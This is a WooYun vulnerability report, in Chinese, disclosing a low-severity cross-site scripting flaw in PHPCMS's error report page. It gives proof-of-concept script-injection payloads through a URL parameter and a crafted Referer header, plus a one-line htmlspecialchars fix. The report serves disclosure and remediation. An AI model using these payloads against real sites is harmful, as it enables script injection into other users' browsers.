PHPCMS全系列某页面跨站脚本漏洞

发表于 2010年07月27日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2010-0119

漏洞标题：PHPCMS全系列某页面跨站脚本漏洞

漏洞详情

披露状态：

2010-07-27: 积极联系厂商并且等待厂商认领中，细节不对外公开
2010-07-27: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

PHPCMS全系列某页面跨站脚本漏洞

详细说明：

PHPCMS全系列错误报告页面跨站脚本漏洞。两种版本1、官方demo页面为url xss.2、官方主站的错误报告页面，$info['error_link']去自referer,更改referer即可插入任意代码。危害不大，漏洞等级，低。

漏洞证明：

POC1：http://**.**.**.**/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script><"POC2：

GET /error_report/error_report.php?title=1 HTTP/1.1<br>
Host: **.**.**.**<br>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:**.**.**.**) Gecko/20091102 Firefox/3.5.5<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>
Accept-Language: zh-cn,zh;q=0.5<br>
Accept-Encoding: gzip,deflate<br>
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7<br>
Keep-Alive: 300<br>
Connection: keep-alive<br>
Cookie: PHPSESSID=4ko75j2uund85mqgerk0fpup67<br>
Referer: "><script>alert(/xss/)</script><"

GET /error_report/error_report.php?title=1 HTTP/1.1<br>

Host: **.**.**.**<br>

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:**.**.**.**) Gecko/20091102 Firefox/3.5.5<br>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>

Accept-Language: zh-cn,zh;q=0.5<br>

Accept-Encoding: gzip,deflate<br>

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7<br>

Keep-Alive: 300<br>

Connection: keep-alive<br>

Cookie: PHPSESSID=4ko75j2uund85mqgerk0fpup67<br>

Referer: "><script>alert(/xss/)</script><"

修复方案：

error_report.php

$info['error_link'] = htmlspecialchars($info['error_link']);

1	$info['error_link'] = htmlspecialchars($info['error_link']);

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：3 (WooYun评价)

评价

2010-01-01 00:00 he1renyagao 白帽子 | Rank:224 漏洞数:28)

mark

原文连接：PHPCMS全系列某页面跨站脚本漏洞 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。